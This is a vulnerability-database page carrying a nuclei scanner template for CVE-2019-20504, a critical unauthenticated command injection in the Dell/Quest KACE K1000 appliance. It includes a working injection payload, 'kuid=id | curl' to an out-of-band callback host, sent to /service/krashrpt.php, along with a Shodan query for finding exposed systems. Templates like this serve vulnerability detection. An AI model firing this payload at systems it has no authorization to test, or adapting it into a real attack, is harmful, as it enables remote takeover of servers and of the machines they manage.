Lucene search
K

Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Dell KACE K1000 6.4.120756 allows remote code execution via vulnerable kuid parameter exploitation.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-20504
23 May 202521:02
circl
CNVD
Quest Software KACE K1000 Systems Management Appliance Code Execution Vulnerability
10 Mar 202000:00
cnvd
CVE
CVE-2019-20504
9 Mar 202000:55
cve
Cvelist
CVE-2019-20504
9 Mar 202000:55
cvelist
NVD
CVE-2019-20504
9 Mar 202001:15
nvd
OSV
CVE-2019-20504
9 Mar 202001:15
osv
Prion
Code injection
9 Mar 202001:15
prion
RedhatCVE
CVE-2019-20504
22 May 202508:28
redhatcve
UbuntuCve
CVE-2019-20504
6 Mar 202020:15
ubuntucve
VulnCheck KEV
VulnCheck KEV: CVE-2019-20504
29 Jun 202400:00
vulncheck_kev
Rows per page
id: CVE-2019-20504

info:
  name: Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Remote Code Execution
  author: DhiyaneshDk
  severity: critical
  description: |
    service/krashrpt.php in Quest KACE K1000 Systems Management Appliance before 6.4 SP3 (6.4.120822) allows a remote attacker to execute code via shell metacharacters in the kuid parameter.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands via shell metacharacters, leading to complete server compromise and access to all managed systems.
  remediation: |
    Upgrade to KACE K1000 version 6.4 SP3 (6.4.120822) or later.
  reference:
    - https://www.exploit-db.com/exploits/46684
    - https://www.rcesecurity.com/2019/04/dell-kace-k1000-remote-code-execution-the-story-of-bug-k1-18652/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-20504
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-20504
    cwe-id: CWE-78
    epss-score: 0.0955
    epss-percentile: 0.94869
    cpe: cpe:2.3:a:quest:kace_systems_management:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: quest
    product: kace_systems_management
    shodan-query: html:"K1000 Logo"
  tags: cve,cve2019,k1000,kace,rce,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "K1000")'
        internal: true

  - raw:
      - |
        POST /service/krashrpt.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        kuid=id | curl http://{{interactsh-url}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"
# digest: 4a0a00473045022100cf08776158004f46d41523eaa18cd82ee3e13885ff759bf7fbbd93714561243202202bfc052d6532bc72cb1144b48ce8f9456bf5ba3a6fc6ef84f032b63353e6600d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.0955
12